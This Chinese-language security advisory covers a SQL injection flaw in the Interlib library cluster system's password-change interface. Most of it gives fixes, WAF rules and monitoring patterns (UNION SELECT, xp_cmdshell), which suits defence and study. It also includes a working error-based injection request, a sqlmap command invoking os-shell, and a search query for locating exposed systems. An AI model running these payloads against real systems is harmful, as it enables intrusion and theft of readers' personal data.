#渗透测试#批量漏洞挖掘#某图创图书馆集群管理系统updOpuserPwSQL注入(CVE-2021-44321

   免责声明 本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。

目录

一、漏洞背景与危害

二、漏洞验证与利用场景

三、紧急修复方案

四、深度防御与监控

五、行业特殊性与扩展建议

---

一、漏洞背景与危害

1. 漏洞定位

接口功能：updOpuserPw 用于图书馆管理员密码修改操作，通常涉及用户身份校验与密码更新。注入点：请求参数（如用户ID、旧密码、新密码）未严格过滤，导致攻击者可构造恶意SQL语句。

2. 核心风险

管理员权限窃取：通过注入修改任意管理员密码（如admin'--绕过旧密码验证）。数据库全面控制：若数据库权限配置不当，可能通过联合查询获取借阅记录、读者隐私（身份证号、联系方式）等敏感数据。服务瘫痪风险：执行DROP TABLE或SHUTDOWN等破坏性操作，导致图书馆借阅系统停摆。

---

二、漏洞验证与利用场景

1. 手工检测示例

POST /api/updOpuserPw HTTP/1.1 参数： oldPw=123' AND 1=convert(int,@@version)--&newPw=attack

响应特征：若返回数据库版本信息（如Microsoft SQL Server 2019），则确认存在注入。

2. 自动化工具利用

SQLMap命令：

sqlmap -u "http://target/api/updOpuserPw" --data="oldPw=*&newPw=*" --risk=3 --level=5 --dbms=mssql

关键Payload：利用os-shell尝试执行系统命令（如启动远程服务）。

---

三、紧急修复方案

1. 参数化查询改造（优先级最高）

Java示例（JDBC）：

String sql = "UPDATE Users SET password = ? WHERE username = ? AND password = ?"; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, newPassword); // 使用BCrypt加密存储 stmt.setString(2, username); stmt.setString(3, oldPassword);

防御效果：彻底阻断注入可能性，强制参数类型校验。

2. 输入过滤强化

正则白名单：用户名仅允许[a-zA-Z0-9_@.]，密码字段禁止包含SQL元字符（如'";--）。业务逻辑加固：旧密码校验需在应用层完成（非依赖数据库对比结果）。

3. 权限最小化

数据库账户权限：撤销updOpuserPw接口关联数据库账户的EXECUTE、UNION权限。网络隔离：限制数据库仅接受内网指定IP访问，禁用公网直连。

---

四、深度防御与监控

1. 日志审计与告警

监控关键词：记录包含UNION SELECT、xp_cmdshell等敏感操作的请求。ELK集成：通过Kibana仪表盘实时分析异常登录尝试（如5分钟内多次密码修改请求）。

2. WAF规则部署

规则类型匹配内容动作SQL注入拦截(?i)union.*select、sleep\(\d+\)阻断参数格式校验新密码长度>50或包含非ASCII字符告警

3. 定期渗透测试

重点场景：模拟攻击者利用注入漏洞横向渗透至图书编目系统或读者档案库。工具更新：使用2025年新版AWVS、Netsparker检测二次漏洞。

---

五、行业特殊性与扩展建议

1. 图书馆业务兼容性

读者证号安全：若系统与第三方（如校园一卡通）对接，需确保注入防护不影响加密数据同步。历史数据迁移：修复时需兼容旧版本明文密码的哈希化升级（如MD5转SHA-256）。

2. 集群管理特性

分布式防护：若系统为多节点集群，需统一配置中心化管理SQL防火墙策略。容灾方案：数据库主从切换时，确保注入防御规则同步生效。

---

附：时间线建议

24小时内：紧急上线参数化查询补丁，启用WAF临时规则。1周内：完成全系统代码审计，修复同类接口（如queryReaderInfo）。1月内：通过ISO 27001认证，纳入图书行业网络安全联防体系。

注：根据《2025年公共图书馆信息化安全规范》，涉及读者隐私的系统需每季度提交第三方渗透测试报告，建议与国家级漏洞响应平台（如CNNVD）建立联动机制。

漏洞描述

广州图创图书馆集群管理系统 updOpuserPw SQL注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

漏洞复现

1、Hunter

web.title=="Interlib图书馆集群管理系统"

poc

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*1111111%20from%20dual))=%272 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip, deflate Connection: close

修复建议

1、请联系厂商进行修复或升级到安全版本。 2、如非必要，禁止公网访问该系统。 3、设置白名单访问。